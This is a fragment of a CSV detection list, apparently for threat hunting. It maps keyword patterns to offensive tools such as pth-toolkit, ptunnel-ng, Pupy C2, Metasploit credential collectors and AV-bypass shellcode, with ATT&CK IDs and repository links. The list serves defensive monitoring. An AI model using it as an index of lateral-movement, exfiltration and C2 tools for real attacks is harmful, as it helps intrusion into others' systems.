+"*pth-rpcclient*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" +"*pth-smbclient*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" +"*PTHSMBClientDelete*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*PTHSMBClientGet*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*PTHSMBClientList*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*PTHSMBClientPut*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*PTHSMBExec*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*pth-smbget*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" +"*pth-toolkit*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" +"*pth-winexe*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" +"*pth-wmic*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" +"*PTHWMIExec*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*pth-wmis*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" +"*PTRACE_SETOPTIONS failure*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*ptresearch/AttackDetection*","offensive_tool_keyword","POC","POC exploits - The Attack Detection Team searches for new vulnerabilities and 0-days. reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally. we are interested in malware and hackers TTPs. so we develop Suricata rules for detecting all sorts of such activities.","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ptresearch/AttackDetection","1","1","N/A","N/A","10","1266","367","2022-08-31T09:26:21Z","2016-03-24T14:42:50Z" +"*ptunnel-client.log*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-data-recv*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-data-send*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-master*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng *","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng.conf*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng.git*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng.service*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng.te*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng-x64.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng-x64-dbg.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng-x86.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-ng-x86-dbg.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*ptunnel-server.log*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" +"*Public\dcinst.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*pupy*/checkvm.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pupy/payload_*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyCmdLoop*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyCredentials.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyDnsCnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyDnsCommandServerHandler*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pupygen.py *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyKCPSocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyLoaderTemplate.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyOffloadDNS*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyOffloadSocket*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupySocketStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*PupyVirtualStream.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pureqh/bypassAV*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pureqh/bypassAV","1","1","N/A","10","10","434","101","2021-05-18T05:03:03Z","2021-02-25T05:26:11Z" +"*purevpn_cred_collector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*purplepanda.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*purplepanda_config.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*purplepanda_github.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*PURPLEPANDA_NEO4J_URL=*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*purplepanda_prints.py*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*PURPLEPANDA_PWD=*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*PurpleSharp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*putterpanda_whoami*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*puttygen.exe FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*puzzlepeaches/NTLMRecon*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*PWCrack*","offensive_tool_keyword","PWCrack","cracking tool for multiple hash type","T1110 - T1111 - T1210 - T1558.002 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","5","456","57","2023-09-27T08:26:21Z","2018-07-01T08:33:55Z" +"*pwd*/*/rules/best64.rule*","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with 